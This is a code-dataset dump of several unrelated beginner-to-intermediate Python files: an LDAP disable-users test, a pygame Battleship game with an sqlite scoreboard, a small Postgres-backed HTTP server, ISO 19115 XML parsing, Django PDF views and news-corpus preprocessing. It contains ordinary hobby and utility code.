{Input.DISTINGUISHED_NAMES: ["CN=empty_search,DC=example,DC=com", "CN=Users,DC=example," "DC=com"]},
{
Output.FAILED: [
{
"dn": "CN=empty_search,DC=example,DC=com",
"error": "An error occurred during plugin "
"execution!\n"
"\n"
"The DN "
"CN=empty_search,DC=example,DC=com was "
"not found. Please provide a valid DN "
"and try again.",
}
],
Output.COMPLETED: ["CN=Users,DC=example,DC=com"],
},
),
(
{Input.DISTINGUISHED_NAMES: ["CN=Users,DC=example,DC=com"]},
{
Output.FAILED: [],
Output.COMPLETED: ["CN=Users,DC=example,DC=com"],
},
),
]
)
@mock.patch("ldap3.Server", mock.MagicMock(return_value=MockServer))
@mock.patch("ldap3.Connection", mock.MagicMock(return_value=MockConnection()))
@default_connector(action=DisableUsers())
def test_disable_users(self, _input, expected, action):
actual = action.run(_input)
self.assertEqual(expected, actual)
@default_connector(action=DisableUsers())
def test_empty_input(self, action):
with self.assertRaises(PluginException) as context:
action.run({Input.DISTINGUISHED_NAMES: []})
self.assertEqual("Distinguished Names must contain at least one entry", context.exception.cause)
self.assertEqual("Please enter one or more Distinguished Names", context.exception.assistance)
|
998,172 | c871061e07442d06cc50fed109e21d9fc60b856a | import flask
import pandas as pd
|
998,173 | 5748998a5a570edbe587c15d4dee854849d5c0d4 | import random
import json
class Animal(object):
DEAD_RATIO = 0.8
DEAD_CHANCE_RATIO = 0.8
LIFE_EXPECTANCIES = {'Snake': 12,
'Horse': 30,
'Wolf': 25,
'Tiger': 24,
'Bear': 40
}
AVERAGE_WEIGHTS = {'Snake': 65,
'Horse': 280,
'Wolf': 60,
'Tiger': 180,
'Bear': 400}
def __init__(self, species, name, age, gender, weight):
self.species = species
self.age = age
self.name = name
self.gender = gender
self.weight = weight
def can_eat(self):
if self.species in Animal.AVERAGE_WEIGHTS:
average_weight = Animal.AVERAGE_WEIGHTS[self.species]
if average_weight < self.weight:
return True
else:
return False
def grow(self):
self.age += 1
self.weight += self.weight * 0.1
def eat(self):
if self.can_eat():
self.weight += 0.5
else:
return
def chance_to_die(self):
if self.species in Animal.LIFE_EXPECTANCIES:
life_expectancy = Animal.LIFE_EXPECTANCIES[self.species]
return self.age / life_expectancy
def is_dead(self):
if self.chance_to_die() > Animal.DEAD_RATIO:
if random.random() > Animal.DEAD_CHANCE_RATIO:
return True
return False
def __str__(self):
return "{0}: {1} {2} months {3} kg".format(
self.name,
self.species,
self.age,
self.weight)
def load_config(self, file_name):
config = open(file_name, 'r')
data = json.loads(config.read())
config.close()
return data
# def jsonify(self, instance):
# fp = open('animals.json', 'a+')
# data = json.dumps(str(instance.__dict__), indent=4, sort_keys=True)
# fp.write(data)
# fp.close()
# a = Animal('Snake', 'Pesho', 12, 'male', 43)
# # print(a)
# # print(a.is_dead())
# data = a._load_config('config.json')
# print(eval(data['animals']))
|
998,174 | 535639656374abf2def5d4d91e1bf77756a36f83 | from http.server import BaseHTTPRequestHandler, HTTPServer
from postcrd import Postgres
import re
from json import dumps
class Handler(BaseHTTPRequestHandler):
def header(self):
self.send_response(200)
self.send_header('Content_type', '')
self.end_headers()
def do_GET(self):
tbody = ''
if self.path.endswith("index.html"):
g= open('html/index.html')
e = ''
data = Postgres().read_db()
e += g.read()
for row in data:
tbody += '<tr>'
for field in row:
tbody += '<td>' + str(field) + '</td>'
tbody += '<td><a href="/' + str(row[0]) +'/ViewDetail/">view</a></td>'
tbody += '</tr>'
index_html = re.sub(r'##tbody##', tbody, e)
self.header()
self.wfile.write(index_html.encode())
elif self.path.split('/')[2]=='ViewDetail':
pid = self.path.split('/')[1]
print(pid)
data = Postgres().read_id(pid)
print(data)
e = ''
e += open('html/view.html').read()
for field in data:
tbody += '<td>' + str(data[field]) + '</td>'
view_html = re.sub(r'##vbody##', tbody, e)
self.header()
self.wfile.write(view_html.encode())
def run(server_class=HTTPServer, handler_class=Handler):
server_address = ('',8000)
httpd =server_class(server_address, handler_class)
httpd.serve_forever()
if __name__=='__main__':
run() |
998,175 | be3e197df204b9f79ca548dd9f9014507c2f40cc | import make_registers
from lxml import etree
def extract_ecat_ids_sax(xml_file, ids_file):
ids = make_registers.extract_ecat_ids(xml_file)
print(len(ids))
open(ids_file, 'w').write('\n'.join((str(id) for id in ids)))
def extract_ecat_ids_xpath(xml_file, ids_file):
namespaces = {
'mdb': 'http://standards.iso.org/iso/19115/-3/mdb/1.0',
'cat': 'http://standards.iso.org/iso/19115/-3/cat/1.0',
'cit': 'http://standards.iso.org/iso/19115/-3/cit/1.0',
'gcx': 'http://standards.iso.org/iso/19115/-3/gcx/1.0',
'gex': 'http://standards.iso.org/iso/19115/-3/gex/1.0',
'lan': 'http://standards.iso.org/iso/19115/-3/lan/1.0',
'srv': 'http://standards.iso.org/iso/19115/-3/srv/2.0',
'mas': 'http://standards.iso.org/iso/19115/-3/mas/1.0',
'mcc': 'http://standards.iso.org/iso/19115/-3/mcc/1.0',
'mco': 'http://standards.iso.org/iso/19115/-3/mco/1.0',
'mda': 'http://standards.iso.org/iso/19115/-3/mda/1.0',
'mds': 'http://standards.iso.org/iso/19115/-3/mds/1.0',
'mdt': 'http://standards.iso.org/iso/19115/-3/mdt/1.0',
'mex': 'http://standards.iso.org/iso/19115/-3/mex/1.0',
'mmi': 'http://standards.iso.org/iso/19115/-3/mmi/1.0',
'mpc': 'http://standards.iso.org/iso/19115/-3/mpc/1.0',
'mrc': 'http://standards.iso.org/iso/19115/-3/mrc/1.0',
'mrd': 'http://standards.iso.org/iso/19115/-3/mrd/1.0',
'mri': 'http://standards.iso.org/iso/19115/-3/mri/1.0',
'mrl': 'http://standards.iso.org/iso/19115/-3/mrl/1.0',
'mrs': 'http://standards.iso.org/iso/19115/-3/mrs/1.0',
'msr': 'http://standards.iso.org/iso/19115/-3/msr/1.0',
'mdq': 'http://standards.iso.org/iso/19157/-2/mdq/1.0',
'mac': 'http://standards.iso.org/iso/19115/-3/mac/1.0',
'gco': 'http://standards.iso.org/iso/19115/-3/gco/1.0',
'gml': 'http://www.opengis.net/gml/3.2',
'xlink': 'http://www.w3.org/1999/xlink',
'geonet': 'http://www.fao.org/geonetwork'
}
r = etree.parse(xml_file)
'''
<mri:MD_DataIdentification>
<mri:citation>
<cit:CI_Citation>
<cit:title>
<gco:CharacterString>Burra 1:250 000 topographic map</gco:CharacterString>
</cit:title>
<cit:identifier>
<mcc:MD_Identifier>
<mcc:code>
<gco:CharacterString>
'''
# candidates = r.xpath('//mri:MD_DataIdentification/mri:citation/cit:CI_Citation/cit:identifier/mcc:MD_Identifier/mcc:code/gco:CharacterString/text()|'
# '//srv:SV_ServiceIdentification/mri:citation/cit:CI_Citation/cit:identifier/mcc:MD_Identifier/mcc:code/gco:CharacterString/text()|'
# '',
# namespaces=namespaces
# )
ids = r.xpath('//mdb:MD_Metadata/mdb:alternativeMetadataReference/cit:CI_Citation/cit:identifier/mcc:MD_Identifier/mcc:code/gco:CharacterString/text()',
namespaces=namespaces
)
open(ids_file, 'w').write('\n'.join([str(x) for x in sorted(ids)]))
print(len(ids))
def count_records(xml_file):
namespaces = {
'mdb': 'http://standards.iso.org/iso/19115/-3/mdb/1.0',
'cat': 'http://standards.iso.org/iso/19115/-3/cat/1.0',
'cit': 'http://standards.iso.org/iso/19115/-3/cit/1.0',
'gcx': 'http://standards.iso.org/iso/19115/-3/gcx/1.0',
'gex': 'http://standards.iso.org/iso/19115/-3/gex/1.0',
'lan': 'http://standards.iso.org/iso/19115/-3/lan/1.0',
'srv': 'http://standards.iso.org/iso/19115/-3/srv/2.0',
'mas': 'http://standards.iso.org/iso/19115/-3/mas/1.0',
'mcc': 'http://standards.iso.org/iso/19115/-3/mcc/1.0',
'mco': 'http://standards.iso.org/iso/19115/-3/mco/1.0',
'mda': 'http://standards.iso.org/iso/19115/-3/mda/1.0',
'mds': 'http://standards.iso.org/iso/19115/-3/mds/1.0',
'mdt': 'http://standards.iso.org/iso/19115/-3/mdt/1.0',
'mex': 'http://standards.iso.org/iso/19115/-3/mex/1.0',
'mmi': 'http://standards.iso.org/iso/19115/-3/mmi/1.0',
'mpc': 'http://standards.iso.org/iso/19115/-3/mpc/1.0',
'mrc': 'http://standards.iso.org/iso/19115/-3/mrc/1.0',
'mrd': 'http://standards.iso.org/iso/19115/-3/mrd/1.0',
'mri': 'http://standards.iso.org/iso/19115/-3/mri/1.0',
'mrl': 'http://standards.iso.org/iso/19115/-3/mrl/1.0',
'mrs': 'http://standards.iso.org/iso/19115/-3/mrs/1.0',
'msr': 'http://standards.iso.org/iso/19115/-3/msr/1.0',
'mdq': 'http://standards.iso.org/iso/19157/-2/mdq/1.0',
'mac': 'http://standards.iso.org/iso/19115/-3/mac/1.0',
'gco': 'http://standards.iso.org/iso/19115/-3/gco/1.0',
'gml': 'http://www.opengis.net/gml/3.2',
'xlink': 'http://www.w3.org/1999/xlink',
'geonet': 'http://www.fao.org/geonetwork'
}
r = etree.parse(xml_file)
records = r.xpath('//mdb:MD_Metadata/mdb:identificationInfo',
namespaces=namespaces
)
print(etree.tostring(records[0], pretty_print=True).decode('utf-8'))
if __name__ == '__main__':
pass
|
998,176 | 532ba476ab24bc9431c082d2ebd25858ed75432c | #coding:utf-8
#数字和数学计算
print "I will now count my chickens:"
print "Hens", 25 + 30 /6
print "Roosters",100-25 *3/4
print "Now I will count the eggs:"
print 3 + 2 + 1 - 5 + 4 % 2 -1 /4 +6
print "It is true that 3 + 2 < 5 -7?"
print 3 +2 < 5-7
print "What is 3+2?", 3+2
print "What is 5-7?", 5-7
print "Oh, that's why it's False."
print "Is it greater?", 5>-2
print "Is it greater or equal?", 5>= -2
print "Is is less or equal?", 5 <= -2
|
998,177 | c87cc29197577fd631259beec521c4c82bec21c0 | import pygame,sqlite3,random
from pygame.constants import MOUSEBUTTONUP, MOUSEMOTION
pygame.init()
#width and height for the screen
display_width=800
display_height=600
#make the slide window
gameDisplay = pygame.display.set_mode((display_width,display_height))
FPS=60
#width and height for the board
Boardwidth=12
Boardheight=12
Tilesize=40
shots=5
#x and y for tile and board
X = int((display_width - (Boardwidth * Tilesize) - (200 + 50)) / 2)
Y = int((display_height - (Boardheight * Tilesize)) / 2)
#Define some colors
Black = (0, 0, 0)
Red = (255, 0, 0)
Sky_Blue=(0,238,238)
Dark_Blue=(100,149,237)
Yellow=(255,255,0)
White=(255,255,255)
Blue=(0,0,255)
Dark_Red=(218,47,10)
light_Red=(251,127,100)
Dark_yellow=(227,207,87)
light_yellow=(255,185,15)
#Set screen and icons
pygame.display.set_caption("BattleShip Fight To the Win!!!")
PickBackground=pygame.image.load("open.jpg")
Background=pygame.image.load("sea.jpg")
# Used to manage how fast the screen updates
clock = pygame.time.Clock()
#make the board
grid = []
for i in range(13):
grid.append([0,0,0,0,0,0,0,0,0,0,0,0])
#make player class
class Player: #player class to save the info about the player
def __init__(self,color,name,ship_color,board_color,miss_color,score,stage,user,type=None):
self.type=type
self.color=color
self.name=name
self.ship_color=ship_color
self.board_color=board_color
self.miss_color=miss_color
self.score=score
self.stage=stage
self.user=user
self.rename=0
#make global player
player=Player(Black,"empty",Black,Black,Black,0,0,"empty") #global player
#connect to the data base
conn = sqlite3.connect('BattleShip.db')
#cursor to get the methods
c = conn.cursor()
def generate_default_tiles(default_value): #side function fill the reveled with false to fresh start
default_tiles = []
for i in range(Boardwidth):
default_tiles.append([default_value] * Boardheight)
return default_tiles
def run_game(): #9
revealed_tiles = generate_default_tiles(False) #make fresh start
make_ships() #make random ships
mousex, mousey = 0, 0
counter = [] #count hits and miss
while True:
# counter display (it needs to be here in order to refresh it)
Smalltext = pygame.font.Font('freesansbold.ttf', 20)
COUNTER_SURF = Smalltext.render(str(len(counter)), True, player.color)
COUNTER_RECT = SHOTS_SURF.get_rect()
COUNTER_RECT.topleft = (display_width - 680, display_height - 570)
# end of the counter
gameDisplay.blit(Background,(0,0))
gameDisplay.blit(SHOTS_SURF, SHOTS_RECT)
gameDisplay.blit(COUNTER_SURF, COUNTER_RECT)
draw_board(grid,revealed_tiles)
button("Quit",600,500,100,50,player.color,"quit")
if Check_Game_Over(len(counter)):
Game_over()
mouse_clicked = False
for event in pygame.event.get():
#click on board
if event.type == MOUSEBUTTONUP:
mousex, mousey = event.pos
mouse_clicked = True
#follow Square
elif event.type == MOUSEMOTION:
mousex, mousey = event.pos
tilex, tiley = get_tile_at_pixel(mousex, mousey)
if tilex != None and tiley != None:
if not revealed_tiles[tilex][tiley]:
draw_highlight_tile(tilex, tiley)
if not revealed_tiles[tilex][tiley] and mouse_clicked:
revealed_tiles[tilex][tiley] = True
counter.append((tilex, tiley))
if grid[tilex][tiley] =='battleship':
player.score=player.score+10
if grid[tilex][tiley] !='battleship':
player.score=player.score+3
Exit_check()
def main(miss_color): #8
player.miss_color=miss_color
global SHOTS_SURF,SHOTS_RECT,COUNTER_SURF,COUNTER_RECT
gameDisplay.blit(Background,(0,0))
Smalltext = pygame.font.Font('freesansbold.ttf', 20)
SHOTS_SURF = Smalltext.render("Shots: ",True, player.color)
SHOTS_RECT = SHOTS_SURF.get_rect()
SHOTS_RECT.topleft = (display_width -750, display_height - 570)
Exit_check()
run_game()
def get_tile_at_pixel(x, y):#side function
for tilex in range(Boardwidth):
for tiley in range(Boardheight):
left = tilex * Tilesize + X
top = tiley * Tilesize + Y
tile_rect = pygame.Rect(left, top, Tilesize, Tilesize)
if tile_rect.collidepoint(x, y):
return (tilex, tiley)
return (None, None)
def draw_highlight_tile(x, y): #side function to show highlight follow the mouse
left, top = x * Tilesize + X , y * Tilesize + Y
pygame.draw.rect(gameDisplay, Black,(left, top, Tilesize, Tilesize), 4)
def button(msg,x,y,w,h,color,action=None): #side function to make buttons
mouse=pygame.mouse.get_pos()
click=pygame.mouse.get_pressed()
if x+w>mouse[0]>x and y+h>mouse[1]>y:
pygame.draw.rect(gameDisplay,color, (x,y,w,h))
if click[0]==1 and action!=None:#if click on button do
if action=="back":
User_Pick()
elif action=="back1" and player.stage==0:
Start_Game(color)
elif action=="back1" and player.stage==1:
Guest_Menu()
elif action=="back1" and player.stage==2:
Admin_Menu()
elif action=="renaming":
Renaming()
elif action=="quit":
if Check_Exit(True):
pygame.quit()
quit()
elif action=="color":
c.execute('SELECT * FROM Type')
data = c.fetchall()
if msg=="Color1":
player.type="Deuteranope"
c.execute("UPDATE Type SET Number = ( ? ) WHERE Name = ( ? )",(data[0][1]+1 if player.type=="Deuteranope" else data[0][1],"Deuteranope"))
if msg=="Color2":
player.type="Protanope"
c.execute("UPDATE Type SET Number = ( ? ) WHERE Name = ( ? )",(data[1][1]+1 if player.type=="Protanope" else data[1][1],"Protanope"))
if msg=="Color3":
player.type="Tritanope"
c.execute("UPDATE Type SET Number = ( ? ) WHERE Name = ( ? )",(data[2][1]+1 if player.type=="Tritanope" else data[2][1],"Tritanope"))
if msg=="Color4":
player.type="Normal Vision"
c.execute("UPDATE Type SET Number = ( ? ) WHERE Name = ( ? )",(data[3][1]+1 if player.type=="Normal Vision" else data[3][1],"Normal Vision"))
Start_Game(color)
elif Check_Logout(action):
Start_Game(color)
elif action=="Statistics":
Statistics()
elif action=="Type":
Type()
elif action=="Games":
Games()
elif Check_Get_in_touch(action):
Get_in_touch()
elif action=="guest":
Guest_Login()
elif action=="login":
Admin_Login()
elif action=="play":
Pick_ships_color()
elif action=="ship":
ship_color=Get_Ship_Color(color)
Pick_Board_color(ship_color)
elif action=="board":
boar_color=Get_Board_Color(color)
Pick_Miss_color(boar_color)
elif action=="miss":
miss_color=Get_Miss_Color(color)
main(miss_color)
else: #show the button
pygame.draw.rect(gameDisplay, color, (x,y,w,h))
Print(msg,Black,20,x+(w/2),y+(h/2))
def draw_board(board, revealed): #side function draw the board
for tilex in range(Boardwidth):
for tiley in range(Boardheight):
left = tilex * Tilesize + X
top = tiley * Tilesize + Y
if not revealed[tilex][tiley]: #if not click draw the board color
pygame.draw.rect(gameDisplay, player.board_color, (left, top, Tilesize,Tilesize))
else:
if board[tilex][tiley] == 'battleship': #if click and hit draw the hit color
pygame.draw.rect(gameDisplay, player.ship_color, (left, top, Tilesize, Tilesize))
else:
#if click and miss draw the miss color
pygame.draw.rect(gameDisplay, player.miss_color, (left, top, Tilesize, Tilesize))
def make_ships(): #side function make all the ships on the boards random
row=random.randrange(0,8)
col=random.randrange(0,2)
#ship 1
for i in range(5):
grid[col][row+i]='battleship'
#ship 2
row=random.randrange(0,9)
col=random.randrange(2,5)
for i in range(4):
grid[col][row+i]='battleship'
#ship 3
row=random.randrange(0,5)
col=random.randrange(5,10)
for i in range(3):
grid[col+i][row]='battleship'
#ship 4
row=random.randrange(5,9)
col=random.randrange(5,11)
for i in range(2):
grid[col][row+i]='battleship'
#ship 5
row=random.randrange(8,10)
col=random.randrange(5,12)
for i in range(3):
grid[col][row+i]='battleship'
def create_tables():# create table in the data bsae
c.execute("CREATE TABLE IF NOT EXISTS NamesAndScores(Name,Score)")
c.execute("CREATE TABLE IF NOT EXISTS Type(Name,Number)")
c.execute("CREATE TABLE IF NOT EXISTS Game(Name,Number)")
c.execute('SELECT * FROM Type')
data = c.fetchall()
if data==[]:
c.execute("INSERT INTO Type(Name, Number) VALUES (?,?)",("Deuteranope", 0))
c.execute("INSERT INTO Type(Name, Number) VALUES (?,?)",("Protanope", 0))
c.execute("INSERT INTO Type(Name, Number) VALUES (?,?)",("Tritanope", 0))
c.execute("INSERT INTO Type(Name, Number) VALUES (?,?)",("Normal Vision", 0))
conn.commit()
def dynamic_game_entry():#make game table in data base
c.execute('SELECT * FROM Game')
data = c.fetchall()
if data==[]:
c.execute("INSERT INTO Game(Name,Number) VALUES (?,?)",("Games",0))
conn.commit()
def sortSecond(val):#get the second value
return val[1]
def min(first,sec):#check for min value
if first<sec:
return first
return sec
def Get_Statistics():#get info from data base
c.execute('SELECT * FROM NamesAndScores')
return c.fetchall()
def Statistics(): #side function to show players name and scores
gameDisplay.blit(Background,(0,0)) #picture of background
data = Get_Statistics()
location=0
names_and_scores=[]
Print("Statistics of the Game:",player.color,60,400,50)
Print("Name Score",player.color,60,400,100)
for row in data:
names_and_scores.append((str(row[0]),int(row[1])))
names_and_scores.sort(key = sortSecond, reverse = True)
for i in range(min(len(names_and_scores),7)):
Print(str(i+1)+".",player.color,40,120,175+location)
Print(names_and_scores[0+i][0],player.color,40,250,175+location)
Print(str(names_and_scores[0+i][1]),player.color,40,550,175+location)
location+=50
while True:
button("Back",200,500,100,50,player.color,"back1")
button("Quit",600,500,100,50,player.color,"quit")
Exit_check()
return "statistics"
def Type(): #side function to show type and count of players
gameDisplay.blit(Background,(0,0)) #picture of background
c.execute('SELECT * FROM Type')
data = c.fetchall()
location=0
type_and_number=[]
Print("Type of Players:",player.color,60,400,50)
Print("Type: Numbers:",player.color,60,400,100)
for row in data:
type_and_number.append((str(row[0]),int(row[1])))
type_and_number.sort(key = sortSecond, reverse = True)
for i in range(min(len(type_and_number),4)):
Print(str(i+1)+".",player.color,40,80,175+location)
Print(type_and_number[0+i][0],player.color,40,250,175+location)
Print(str(type_and_number[0+i][1]),player.color,40,550,175+location)
location+=50
while True:
button("Back",200,500,100,50,player.color,"back1")
button("Quit",600,500,100,50,player.color,"quit")
Exit_check()
def Games(): #side function
gameDisplay.blit(Background,(0,0)) #picture of background
c.execute('SELECT * FROM Game')
data = c.fetchall()
Print("Number of Games:",player.color,60,400,50)
Print("1 . Games : "+str(data[0][1]),player.color,40,150,150)
while True:
button("Back",200,500,100,50,player.color,"back1")
button("Quit",600,500,100,50,player.color,"quit")
Exit_check()
def Update_table(): #side function to update number of games and player and his score
c.execute('SELECT * FROM Game')
data = c.fetchall()
c.execute("UPDATE Game SET Number = ( ? ) WHERE Name = ( ? ) ",(int(data[0][1])+1,"Games"))
c.execute("INSERT INTO NamesAndScores(Name, Score) VALUES (?,?)",(player.name, player.score))
conn.commit()
def Check_Game_Over(shot):#side function to check if the game is over
if shot==shots:
return True
else:
return False
def Game_over(): #10
Update_table() #update count of games and player and score
gameDisplay.blit(Background,(0,0)) #picture of background
Print(player.name+" your scores is : "+str(player.score),player.color,50,400,200)
Print("Game Over xD ",player.color,60,400,100)
while True:
button("Back",200,500,100,50,player.color,"back1")
button("Quit",600,500,100,50,player.color,"quit")
Exit_check()
def Get_Miss_Color(color):#side function to get miss color
Player.miss_color=color
return Player.miss_color
def Pick_Miss_color(board_color): #7 pick color of miss
player.board_color=board_color
gameDisplay.blit(Background,(0,0)) #picture of background
Print("Pick Miss Color: ",player.color,40,300,250)
while True:
#user pick color
button("miss",450,300,100,50,Yellow,"miss")
button("miss",300,300,100,50,light_yellow,"miss")
button("miss",150,300,100,50,Dark_yellow,"miss")
button("Quit",600,500,100,50,player.color,"quit")
Exit_check()
def Get_Board_Color(color):#side function to get board color
Player.board_color=color
return Player.board_color
def Pick_Board_color(ship_color): #6 pick color of the board
player.ship_color=ship_color
gameDisplay.blit(Background,(0,0)) #picture of background
Print("Pick Board Color: ",player.color,40,300,150)
while True:
#user pick board color
button("board",450,220,100,50,Blue,"board")
button("board",300,220,100,50,Sky_Blue,"board")
button("board",150,220,100,50,Dark_Blue,"board")
button("Quit",600,500,100,50,player.color,"quit")
Exit_check()
def Get_Ship_Color(color):#side function to get ship color
Player.ship_color=color
return Player.ship_color
def Pick_ships_color(): #5 pick color of the hits
gameDisplay.blit(Background,(0,0)) #picture of background
Print("Pick Ship: ",player.color,40,250,50)
while True:
#user pick color for hit
button("ship",450,105,100,50,Red,"ship")
button("ship",300,105,100,50,Dark_Red,"ship")
button("ship",150,105,100,50,light_Red,"ship")
button("Quit",600,500,100,50,player.color,"quit")
Exit_check()
def Get_new_Name(new_name):#side function to get new name
Player.name=new_name
return Player.name
def Renaming(): #side function to change name
gameDisplay.blit(Background,(0,0)) #picture of background
Print("Please Enter your new Nickname :",player.color,40,400,150)
Print("Nickname: ",player.color,40,180,220)
while True:
button("Quit",600,500,100,50,player.color,"quit")
name_text_box(player.color) #text box
Exit_check()
def name_text_box(color): #side function
input_box = pygame.Rect(330, 205, 140, 32) #position of the text box
active = False
text = '' #to save the input
while True:
for event in pygame.event.get(): #loop to check if click on quit
if event.type==pygame.QUIT:
pygame.quit()
quit()
if event.type == pygame.MOUSEBUTTONDOWN:
# If the user clicked on the input_box rect.
if input_box.collidepoint(event.pos):
# Toggle the active variable.
active = not active
else:
active = False
if event.type == pygame.KEYDOWN: #get the text
if active:
if event.key == pygame.K_BACKSPACE:
text = text[:-1]
elif event.key==pygame.K_KP_ENTER or event.key==pygame.K_SPACE:
player.name=Get_new_Name(text) #after press enter go to admin/guest
if text=="":
wrong_input()
elif player.user=="guest":
Guest_Menu()
elif player.user=="ADMIN" and text=="admin":
Admin_Menu()
elif player.user=="ADMIN" and player.rename==1:
Admin_Menu()
elif player.user=="ADMIN" and text!="admin":
wrong_input()
else:
text += event.unicode
font = pygame.font.Font(None, 32)
txt_surface = font.render(text, True, color)
width = max(200, txt_surface.get_width()+10)
input_box.w = width
gameDisplay.blit(txt_surface, (input_box.x+5, input_box.y+5))
pygame.draw.rect(gameDisplay, color, input_box, 2)
Exit_check()
def Guest_Menu(): #4
player.stage=1
player.score=0
gameDisplay.blit(Background,(0,0)) #picture of background
Print("Player : "+player.name,player.color,60,400,150)
while True:
button("Renaming",50,50,200,50,player.color,"renaming")
button("Play",300,200,200,100,player.color,"play")
button("Get in touch",550,50,200,50,player.color,"get in touch")
button("Quit",600,500,100,50,player.color,"quit")
button("Logout",475,500,100,50,player.color,"logout")
button("Statistics",350,500,100,50,player.color,"Statistics")
Exit_check()
def Check_Logout(action):#side function to check true and false
if action=="logout":
return True
else:
False
def Check_Get_in_touch(action):#side function to check true and false
if action=="get in touch":
return True
else:
return False
def Admin_Menu(): #4
player.stage=2
player.rename=1
player.score=0
gameDisplay.blit(Background,(0,0)) #picture of background
Print("Admin : "+player.name,player.color,60,400,150)
while True:
button("Renaming",50,50,200,50,player.color,"renaming")
button("Play",300,200,200,100,player.color,"play")
button("Get in touch",550,50,200,50,player.color,"get in touch")
button("Quit",600,500,100,50,player.color,"quit")
button("Logout",475,500,100,50,player.color,"logout")
button("Statistics",480,400,100,50,player.color,"Statistics")
button("Types",350,400,100,50,player.color,"Type")
button("Games",220,400,100,50,player.color,"Games")
Exit_check()
def Guest_Login(): #3
player.user="guest"
player.stage=1
gameDisplay.blit(Background,(0,0)) #picture of background
Print("Please Enter your Info:",player.color,60,400,150)
Print("Nickname:",player.color,40,180,220)
while True:
button("Quit",600,500,100,50,player.color,"quit")
name_text_box(player.color) #text box
Exit_check()
def wrong_input(): #to let the user he enter wrong input
player.stage=0
gameDisplay.blit(Background,(0,0)) #picture of background
Print("You Enter Wrong Info",player.color,60,400,150)
Print("go back and try again",player.color,60,400,250)
while True:
button("Quit",600,500,100,50,player.color,"quit")
button("Back",200,500,100,50,player.color,"back1")
Exit_check()
def Admin_Login(): #3
player.user="ADMIN"
player.stage=2
gameDisplay.blit(Background,(0,0)) #picture of background
Print("Please Enter your Info:",player.color,60,400,150)
Print("Username:",player.color,40,180,220)
while True:
button("Quit",600,500,100,50,player.color,"quit")
name_text_box(player.color) #text box
Exit_check()
def Get_in_touch(): #side function to get info
gameDisplay.blit(Background,(0,0))
Print("Ways to Contact:",player.color,60,400,150)
Print("Mail = help@battleship.help ",player.color,40,400,200)
Print("phone = 0204060 ",player.color,40,400,250)
while True:
button("Quit",600,500,100,50,player.color,"quit")
button("Back",200,500,100,50,player.color,"back1")
Exit_check()
def Print(text,color,font_size,cord1,cord2):#function to print for the user
latgetext=pygame.font.Font('freesansbold.ttf',font_size) #font and size
textSurface=latgetext.render(text,True,color)
TextRect=textSurface.get_rect()
TextRect.center=(cord1,cord2)
gameDisplay.blit(textSurface,TextRect) #display the text
def Get_user_Color(color):#side function to check color
return color
def Start_Game(color):#2
player.color=Get_user_Color(color)
player.rename=0
player.stage=0
gameDisplay.blit(Background,(0,0)) #picture of background
Print("Welcome to Battleship",player.color,60,400,150)
while True:
button("Guest",480,220,90,50,player.color,"guest")
button("Login",220,220,90,50,player.color,"login")
button("Quit",600,500,100,50,player.color,"quit")
button("Back",100,500,100,50,player.color,"back")
button("Statistics",50,50,100,50,player.color,"Statistics")
button("Get in touch",550,50,200,50,player.color,"get in touch")
Exit_check()
def User_Pick(): #1
#crate tables in database
dynamic_game_entry()
while True:
#user pick type of color blindness
button("Color1",75,180,140,150,Yellow,"color")
button("Color2",333,175,140,150,Yellow,"color")
button("Color3",575,175,140,150,Red,"color")
button("Color4",332,400,140,150,Red,"color")
gameDisplay.blit(PickBackground,(0,0))
button("Quit",600,500,100,50,White,"quit")
Exit_check()
def Check_Exit(TrueOrFales):#side function to check for exit
if TrueOrFales==True:
return True
else:
return False
def Exit_check(): #check if click on exit and update display
for event in pygame.event.get(): #loop to check if click on quit
if event.type==pygame.QUIT:
pygame.quit()
quit()
pygame.display.update()
clock.tick(FPS)
create_tables()
User_Pick()
pygame.quit()
c.close
conn.close() |
998,178 | 07ca3bcbf9d17a26cf576984aa36104bfa0e4a4d | calificaciones = {"calculo": 10, "dibujo": 5}
sumaCalificaciones = calificaciones.get("calculo") + calificaciones.get("dibujo")
totalNota = sumaCalificaciones / 2
print("El promedio mayor es calculo: ", calificaciones.get("calculo"), '\n', calificaciones.get("dibujo"), '\n', totalNota) |
998,179 | 3923a1046583d2898b6bdb64243fa9aee1a65bb4 | from django.views.generic.base import TemplateView
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import authentication, permissions
from api.models import Member
from api.serializers import UserSerializer
from authentication import QuietBasicAuthentication
from easy_pdf.views import PDFTemplateView
from reportlab.pdfgen import canvas
from django.http import HttpResponse
from pdf_generator import generate_pdf
class IndexView(TemplateView):
template_name = "index.html"
class AuthView(APIView):
authentication_classes = (QuietBasicAuthentication,)
serializer_class = UserSerializer
def post(self, request, *args, **kwargs):
return Response(self.serializer_class(request.user).data)
class HelloPDFView(PDFTemplateView):
template_name = "pdf_template.html"
def pdf_view(request, pk):
member = Member.objects.get(id=pk)
# import pdb; pdb.set_trace()
# Create the HttpResponse object with the appropriate PDF headers.
response = HttpResponse(content_type='application/pdf')
response['Content-Disposition'] = 'attachment; filename="somefilename.pdf"'
# # Create the PDF object, using the response object as its "file."
# p = canvas.Canvas(response)
#
# # Draw things on the PDF. Here's where the PDF generation happens.
# # See the ReportLab documentation for the full list of functionality.
# p.drawString(100, 100, "Hello world.")
#
# # Close the PDF object cleanly, and we're done.
# p.showPage()
# p.save()
generate_pdf(response, pk)
return response |
998,180 | dbf010209a585ca953bb2092271e93fa2778584e | import cv2
cap = cv2.VideoCapture(1)
while True:
_, vid = cap.read()
cv2.imshow("Camera", vid)
if cv2.waitKey(10) == ord('q'):
break
cap.release()
cv2.destroyAllWindows() |
998,181 | 85f9436227040564788d24c38a3b5518b57538c8 | import numpy as np
A = np.random.randint(0, 10, size=(3, 2))
B = np.random.randint(0, 10, size=(3, 3, 3))
C = np.random.randint(0, 10, size=(3, 1))
# print(A**2)
# print(np.sqrt(A))
# print(A)
# print(C)
# print(A + C)
# print(B + C)
print(B)
B[:, 0:2, 0:2] -= 20
print(B)
|
998,182 | 994cd8fbb4dbdb67ff6a6e4223e5018bcf5a64f1 | """
预处理部分1:
利用清华语料库,处理10类的新闻数据
从清华数据源文件中提取需要的5万数据
"""
import os
import shutil
class_list = {'财经': 'Economics', '房产': 'House', '社会': 'Society', '时尚': 'Fashion', '教育': 'Education',
'科技': 'Technology', '时政': 'Politics', '体育': 'PE', '游戏': 'Game', '娱乐': 'Entertainment'}
for class_name, class_name_en in class_list.items():
dir_path = 'D:/下载/THUCNews/THUCNews/' + class_name
file_list = os.listdir(dir_path)
print(class_name + ':' + str(len(file_list)))
